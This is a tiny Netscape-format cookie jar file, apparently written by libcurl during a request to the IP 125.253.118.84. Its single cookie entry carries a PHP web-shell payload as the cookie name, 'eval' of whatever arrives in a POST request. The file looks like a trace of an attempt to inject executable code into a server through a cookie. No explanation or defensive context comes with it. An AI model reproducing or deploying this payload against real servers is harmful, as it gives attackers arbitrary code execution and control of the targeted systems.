# Netscape HTTP Cookie File
# http://curl.haxx.se/rfc/cookie_spec.html
# This file was generated by libcurl! Edit at your own risk.

125.253.118.84	FALSE	/about/	FALSE	0	<?eval(stripslashes(array_pop($_POST)))?>	1
